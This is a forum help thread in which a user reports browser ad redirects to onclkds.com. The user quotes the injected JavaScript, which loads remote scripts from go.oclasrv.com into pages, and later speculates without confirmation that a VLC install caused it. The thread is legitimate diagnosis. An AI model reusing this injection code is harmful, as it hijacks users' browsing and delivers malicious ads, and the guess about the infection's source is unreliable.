Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Browser redirecting google ads to onclkds.com


  • This topic is locked This topic is locked
1 reply to this topic

#1 fabioz

fabioz

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:12:23 AM

Posted 09 July 2017 - 07:45 AM

Hi, I've just gotten some nasty redirect to onclkds.com.

 

The symptoms is that all the browsers in my machine are redirecting google ads to onclkds.com when the page requested is not in a https connection.

 

I digged a bit more and discovered that the virus is actually making any request to:

 

http://pagead2.googlesyndication.com/pagead/show_ads.js

 

return the following javacript:

 

if (typeof js_71192 === 'undefined') { var js_71192 = document.createElement('script'); js_71192.type='text/javascript'; ; js_71192.src='http://go.oclasrv.com/apu.php?zoneid=877371'; var dns_qc_head = document.getElementsByTagName('head')[0]; if (dns_qc_head) { dns_qc_head.appendChild(js_71192);}};function f_80091(){ if (typeof js_80207 === 'undefined') { var js_80207 = document.createElement('script'); js_80207.type='text/javascript'; ; js_80207.src='http://pagead2.googlesyndication.com/r.php'; var dns_qc_head = document.getElementsByTagName('head')[0]; if (dns_qc_head) { dns_qc_head.appendChild(js_80207);}}; }; setTimeout(f_80091,120000);

 

and http://go.oclasrv.com actually redirects to onclkds.com

 

(so, it's easy to see that I'm infected)

 

As a current workaround I've turned on the adblockers and it doesn't appear anymore, but I know the virus is out there serving me onclkds.com in the place of google ads.

 

As a note, I tried it without a browser too -- using python:

 

>>> import requests
 
and it has shown me the same malware javascript -- also, the browsers don't have any extension installed (i.e.: definitely something happening in the system level).

 

I've tried avast, hitman pro (portable), rogue killer (portable) and they didn't find anything. Any tips on how to get rid of that?



BC AdBot (Login to Remove)

 


#2 fabioz

fabioz
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:12:23 AM

Posted 09 July 2017 - 09:04 AM

Humm, apparently it was something on my VLC install.

 

I checked my install history and it was the latest program I had installed. I removed it and apparently the redirect no longer takes place.

 

Although I also did other things (created restore point, created FRST, used avast, hitman pro (portable), rogue killer (portable), adwcleaner) -- although they all said they didn't find anything, so, I VLC still seems the most likely in my case (although it only disappeared after uninstalling it, and restarting the computer -- the VLC install seems to have a VideoLAN signature, so, I find this a bit hard to grok as it's definitely not a software where I'd expect to find anything, so, who knows, it may be something which had infected it and is still lurking around or has a delayed initialization or more random behavior...

 

Anyways, I currently don't have the redirect anymore. I took a look myself on the logs generated in FRST and didn't find anything suspicious. If something happens again I'll report back.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users